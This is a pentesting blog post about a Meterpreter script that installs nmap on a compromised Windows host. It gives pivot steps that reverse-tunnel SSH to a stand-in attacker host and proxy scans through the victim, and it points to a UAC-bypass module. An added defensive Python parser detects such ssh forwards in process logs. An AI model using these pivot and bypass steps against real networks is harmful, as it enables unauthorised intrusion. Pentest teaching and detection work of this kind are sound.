Meterpreter script – deploy_nmap.rb

Using a ‘trusted’ host that you have compromised as leverage during a pentest is nearly always advantageous. I personally believe that the steps of pentesting change, in a sense, once you have a session on a computer in an internal network from an external computer.

I would revert back to reconnaissance (depending on the circumstances), since the point of view has changed. The hijacked host is “your man on the inside”, and what better way to give the ‘man on the inside’ some ‘eyes’ than by deploying and using nmap!

One means of using nmap through the compromised host is the following:

1.) Deploying an openssh server on the victim machine

2.) Setting up an account

3.) Reversing an ssh session like so: ssh -R 2222:localhost:22 attacker@attackersbox.com

4.) Then you would connect back to the victim using a socks5 proxy: ssh -D 9050 victimaccount@localhost -p 2222

5.) Lastly, you would use nmap and proxychains from the attacker’s host to scan hosts internally through a tunnel between you and the victim machine.
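
Seen from the defending side, the forwards in steps 3 and 4 show up in process-creation telemetry as ssh options. The following is an added example, not part of the original post or of deploy_nmap.rb: it parses ssh command lines for -R, -D and -L the way ssh itself reads them (clustered flags, attached values, options after the destination). The record format, host names and function names are assumptions.

```python
# Options that consume a value, per the ssh(1) synopsis; needed so a value such as
# "-p 2222" is not mistaken for the destination or for a flag cluster.
ARG_OPTS = set("BbcDEeFIiJLlmOoPpQRSWw")
FORWARD = {"R": "remote-forward", "D": "dynamic-socks", "L": "local-forward"}

def ssh_forwards(cmdline):
    """Return [(kind, spec)] for each -R/-D/-L option in one ssh command line."""
    argv = cmdline.split()          # shell quoting is ignored; enough for flag parsing
    exe = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower() if argv else ""
    if exe not in ("ssh", "ssh.exe"):
        return []
    found, seen_dest, i = [], False, 1
    while i < len(argv):
        tok = argv[i]
        i += 1
        if not tok.startswith("-") or tok == "-":
            if seen_dest:           # second bare word starts the remote command
                break
            seen_dest = True        # ssh keeps parsing options after the destination
            continue
        for pos, opt in enumerate(tok[1:], start=1):
            if opt not in ARG_OPTS:
                continue            # boolean flag inside a cluster such as -fN
            value = tok[pos + 1:]   # attached form: -R2222:localhost:22
            if not value and i < len(argv):
                value, i = argv[i], i + 1
            if opt in FORWARD:
                found.append((FORWARD[opt], value))
            break                   # the rest of the token was the value
    return found

def scan(events):
    """events: dicts with 'host' and 'cmdline'. Returns one alert dict per forward."""
    alerts = []
    for ev in events:
        for kind, spec in ssh_forwards(ev["cmdline"]):
            # A remote forward whose target port is 22 publishes this host's own sshd
            exposes_sshd = kind == "remote-forward" and spec.rsplit(":", 1)[-1] == "22"
            alerts.append({"host": ev["host"], "kind": kind, "spec": spec,
                           "exposes_sshd": exposes_sshd})
    return alerts

# Constructed process-creation records; the first two reuse the commands from the steps
SAMPLE = [
    {"host": "ws-17", "cmdline": "ssh -R 2222:localhost:22 attacker@attackersbox.com"},
    {"host": "jump", "cmdline": "ssh -D 9050 victimaccount@localhost -p 2222"},
    {"host": "ws-17", "cmdline": r"C:\Windows\System32\OpenSSH\ssh.exe -fNR2222:localhost:22 u@h.example"},
    {"host": "ws-03", "cmdline": "ssh -p 22 admin@fileserver uptime -R"},
]
```

Calling `scan(SAMPLE)` yields three alerts; the last record produces none because `-R` there belongs to the remote command, not to ssh.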

Keep in mind that the Metasploit framework has an auxiliary module “auxiliary/scanner/portscan”, which you can use, but let me be quite frank: it doesn’t compare to what is known as the ‘king of all port scanners’, nmap. (No offense, Metasploit crew.)

This is why I programmed a meterpreter script that downloads the latest stable version of nmap from www.insecure.org and then deploys nmap onto the victim’s machine. You could then use the victim’s machine to do vulnerability scanning with nmap’s scripting engine (e.g. nmap --script=smb-check-vulns).

The script has a removal feature that will uninstall nmap and winpcap from the victim’s machine. Please e-mail me or comment if you have any questions, concerns or problems with the script.

NOTE: On versions of Microsoft Windows that use the UAC service, you will most likely need to disable or circumvent this service to successfully deploy nmap. Luckily there is a module in the Metasploit framework that will help you (post/windows/escalate/bypassuac).

http://zitstif.no-ip.org/meterpreter/deploy_nmap.txt